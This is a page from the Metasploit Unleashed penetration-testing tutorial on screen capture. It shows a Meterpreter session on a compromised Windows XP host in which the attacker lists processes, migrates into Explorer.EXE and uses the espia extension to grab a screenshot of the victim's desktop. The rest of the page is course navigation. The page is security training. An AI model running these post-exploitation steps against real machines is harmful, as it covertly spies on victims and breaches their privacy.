Offensive Security
  • Blog
  • Courses
    • Online Courses
      • Penetration Testing with Kali Linux (PWK)
      • Offensive Security Wireless Attacks (WiFu)
      • Cracking the Perimeter (CTP)
    • Live Courses
      • Advanced Windows Exploitation (AWE)
      • Advanced Web Attacks and Exploitation (AWAE)
    • In-House Training
      • In-House Security Training
  • Certifications
    • OSCP Certified Professional
    • OSWP Wireless Professional
    • OSCE Certified Expert
    • OSEE Exploitation Expert
    • OSWE Web Expert
  • Online Labs
    • Virtual Pentesting Labs
  • Penetration Testing
    • Penetration Testing Services
    • Advanced Attack Simulation Services
    • Application Security Assessment Services
  • Projects
    • Kali Linux VM and ARM Downloads
    • Kali Linux NetHunter Downloads
    • Metasploit Unleashed
    • The Exploit Database
    • Google Hacking Database (GHDB)
    • BackTrack Linux
  • About
    • Offensive Security Vision
    • Contact Us
    • Bug Bounty Program
    • Course Reviews
    • Offsec FAQ

Screen Capture

Screen Capturing in Metasploit

Another feature of meterpreter is the ability to capture the victims desktop and save them on your system. Let’s take a quick look at how this works. We’ll already assume you have a meterpreter console, we’ll take a look at what is on the victims screen.

[*] Started bind handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:34117 -> 192.168.1.104:4444)

meterpreter > ps

Process list
============

    PID   Name                 Path
    ---   ----                 ----
    180   notepad.exe          C:\WINDOWS\system32\notepad.exe
    248   snmp.exe             C:\WINDOWS\System32\snmp.exe
    260   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    284   surgemail.exe        c:\surgemail\surgemail.exe
    332   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    612   VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    620   VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    648   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    664   GrooveMonitor.exe    C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
    728   WZCSLDR2.exe         C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
    736   jusched.exe          C:\Program Files\Java\jre6\bin\jusched.exe
    756   msmsgs.exe           C:\Program Files\Messenger\msmsgs.exe
    816   smss.exe             \SystemRoot\System32\smss.exe
    832   alg.exe              C:\WINDOWS\System32\alg.exe
    904   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
    928   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
    972   services.exe         C:\WINDOWS\system32\services.exe
    984   lsass.exe            C:\WINDOWS\system32\lsass.exe
    1152  vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    1164  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1276  nwauth.exe           c:\surgemail\nwauth.exe
    1296  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1404  svchost.exe          C:\WINDOWS\System32\svchost.exe
    1500  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1652  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1796  spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
    1912  3proxy.exe           C:\3proxy\bin\3proxy.exe
    2024  jqs.exe              C:\Program Files\Java\jre6\bin\jqs.exe
    2188  swatch.exe           c:\surgemail\swatch.exe
    2444  iexplore.exe         C:\Program Files\Internet Explorer\iexplore.exe
    3004  cmd.exe              C:\WINDOWS\system32\cmd.exe

meterpreter > migrate 260
[*] Migrating to 260...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screengrab
Screenshot saved to: /root/nYdRUppb.jpeg
meterpreter >

We can see how effective this was in migrating to the explorer.exe, be sure that the process your meterpreter is on has access to active desktops or this will not work.

  • Metasploit Unleashed
  • Donate – Help Feed a Child
  • Introduction
    • Requirements
    • Metasploit Architecture
      • Filesystem And Libraries
      • Modules and Locations
      • Metasploit Object Model
      • Mixins and Plugins
  • Metasploit Fundamentals
    • Msfcli
    • Msfconsole
      • Msfconsole Commands
    • Exploits
      • Using Exploits
    • Payloads
      • Payload Types
      • Generating Payloads
    • Databases
      • Using the Database
    • Meterpreter
      • Meterpreter Basics
  • Information Gathering
    • Port Scanning
    • Hunting for MSSQL
    • Service Identification
    • Password Sniffing
      • Extending Psnuffle
    • SNMP Sweeping
    • Writing Your Own Scanner
  • Vulnerability Scanning
    • SMB Login Check
    • VNC Authentication
    • WMAP Web Scanner
    • Working with NeXpose
      • NeXpose via MSFconsole
    • Working with Nessus
      • Nessus via MSFconsole
  • Writing a Simple Fuzzer
    • Simple TFTP Fuzzer
    • Simple IMAP Fuzzer
  • Exploit Development
    • Exploit Development Goals
    • Exploit Format
    • Exploit Mixins
    • Exploit Targets
    • Exploit Payloads
      • MSFvenom
        • MSFpayload
        • MSFencode
      • Alphanumeric Shellcode
      • MSFrop
    • Writing an Exploit
      • Getting a Shell
    • Using the Egghunter Mixin
      • Completing the Exploit
    • Porting Exploits
  • Web App Exploit Dev
    • Installing Dot Defender
    • Analyzing the Exploit
    • Skeleton Creation
    • Making a Log Entry
    • Hosting the JavaScript
    • Final Exploit
  • Client Side Attacks
    • Binary Payloads
      • Binary Linux Trojan
    • Client Side Exploits
    • VBScript Infection Methods
  • MSF Post Exploitation
    • Privilege Escalation
    • PSExec Pass the Hash
    • Event Log Management
    • Fun with Incognito
    • Interacting with the Registry
      • Persistent Netcat Backdoor
    • Enabling Remote Desktop
    • Packet Sniffing
    • Pivoting
      • Portfwd
    • TimeStomp
    • Screen Capture
    • Searching for Content
    • John the Ripper
  • Meterpreter Scripting
    • Existing Scripts
    • Writing Meterpreter Scripts
    • Custom Scripting
    • Useful API Calls
    • Useful Functions
  • Maintaining Access
    • Keylogging
    • Meterpreter Backdoor
      • Interacting With Metsvc
    • Persistent Backdoors
      • Meterpreter Service
  • MSF Extended Usage
    • Mimikatz
    • PHP Meterpreter
    • Backdooring EXE Files
    • Karmetasploit
      • Karmetasploit Configuration
      • Karmetasploit In Action
      • Attack Analysis
    • MSF vs OS X
    • File-Upload Backdoors
    • Building A Module
    • Payloads Through MSSQL
      • Creating Our Auxiliary Module
      • The Guts Behind an Auxiliary Module
  • Metasploit GUIs
    • MSF Community Edition
      • MSF Community Scanning
      • MSF Community Exploitation
      • MSF Community Post Exploitation
    • Armitage
      • Armitage Setup
      • Armitage Scanning
      • Armitage Exploitation
      • Armitage Post Exploitation
  • Post Module Reference
  • Auxiliary Module Reference
    • Admin HTTP Auxiliary Modules
    • Admin MySQL Auxiliary Modules
    • Admin MSSQL Auxiliary Modules
    • Admin Postgres Auxiliary Modules
    • Admin VMWare Auxiliary Modules
    • Scanner DCERPC Auxiliary Modules
    • Scanner Discovery Auxiliary Modules
    • Scanner FTP Auxiliary Modules
    • Scanner HTTP Auxiliary Modules
    • Scanner MySQL Auxiliary Modules
    • Scanner MSSQL Auxiliary Modules
    • Scanner IMAP Auxiliary Modules
    • Scanner NetBIOS Auxiliary Modules
    • Scanner POP3 Auxiliary Modules
    • Scanner SMB Auxiliary Modules
    • Scanner SMTP Auxiliary Modules
    • Scanner SNMP Auxiliary Modules
    • Scanner SSH Auxiliary Modules
    • Scanner Telnet Auxiliary Modules
    • Scanner TFTP Auxiliary Modules
    • Scanner VMWare Auxiliary Modules
    • Scanner VNC Auxiliary Modules
    • Server Capture Auxiliary Modules

Offensive Security Twitter Feed

Tweets by @offsectraining

Offsec Say Try Harder!

https://www.offensive-security.com/wp-content/uploads/2015/01/offensive-security-try-harder-2.0.mp3

Watch our Offsec Jam

Popular Offsec Blog Posts

  • Kali Linux 2.0 Top 10 Post Install Tips Kali Linux 2.0 Top 10 Post Install Tips With Kali 2.0 now released, we wanted to share a few post install procedures we find ourselves repeating over ...
  • Kali 2.0 Dojo Black Hat / DEF CON USA 2015 Kali 2.0 Dojo Black Hat / DEF CON USA 2015 Last years event was a rousing success, with many attendees staying all day long and working through the multi...
  • Kali Linux Evil Wireless Access Point Kali Linux Evil Wireless Access Point A few days ago, we had the opportunity to deploy a rogue access point that would steal user credentials using ...
  • Kali Linux ISO of Doom Kali Linux ISO of Doom In our last blog post, we provided an example of running an unattended network installation of Kali Linux. Our...
  • Kali Linux on a Raspberry Pi (A/B+/2) with Disk Encryption Kali Linux on a Raspberry Pi (A/B+/2) with Disk Encryption With the advent of smaller, faster ARM hardware such as the new Raspberry Pi 2 (which now has a Kali image bui...
  • Kali USB – Multiple Persistent Stores Kali USB – Multiple Persistent Stores One of the markings of the 1.0.7 Kali release was the introduction of Kali Live USB LUKS encrypted persistent ...
  • Feedback
  • Privacy Policy
  • Terms and Conditions
  • RSS Feed
© Copyright 2015 Offensive Security